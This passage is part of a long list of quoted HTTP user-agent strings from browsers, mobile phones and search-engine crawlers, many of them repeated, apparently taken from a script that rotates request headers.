'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
